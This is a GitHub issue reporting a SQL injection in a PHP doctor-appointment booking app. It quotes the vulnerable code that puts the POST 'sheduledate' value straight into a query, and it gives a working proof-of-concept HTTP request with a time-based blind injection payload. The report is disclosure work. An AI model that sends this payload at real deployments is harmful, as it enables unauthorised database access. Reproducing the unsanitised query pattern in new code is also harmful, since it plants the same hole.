search

HashenUdara / edoc-doctor-appointment-system

This PHP-based open source project is a web application for booking medical appointments. Patients can use the platform to easily schedule appointments with their doctors, saving time and effort. The project's source code is open for anyone to use, modify, and distribute according to their needs.
MIT License
312 stars 120 forks source link

Found a vulnerability #18

Open 0clickjacking0 opened 2 years ago

0clickjacking0 commented 2 years ago

Vulnerability file address

patient/appointment.php from line 54,The $sheduledate parameter is controllable, the parameter sheduledate can be passed through post, and the $sheduledate is not protected from sql injection, line 72 $result= $database->query($sqlmain); causes sql injection

......
......
......
if($_POST){
        //print_r($_POST);
        if(!empty($_POST["sheduledate"])){
            $sheduledate=$_POST["sheduledate"];
            $sqlmain.=" and schedule.scheduledate='$sheduledate' ";
        };
        //echo $sqlmain;
    }
    $sqlmain.="order by appointment.appodate  asc";
    $result= $database->query($sqlmain);
......
......
......

POC

POST /patient/appointment.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=u44s5v8gjuhqo5508209d5nnm1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

sheduledate=1' AND (SELECT 3111 FROM (SELECT(SLEEP(5)))eooa)-- VhwP

Attack results pictures

image-20220806120634233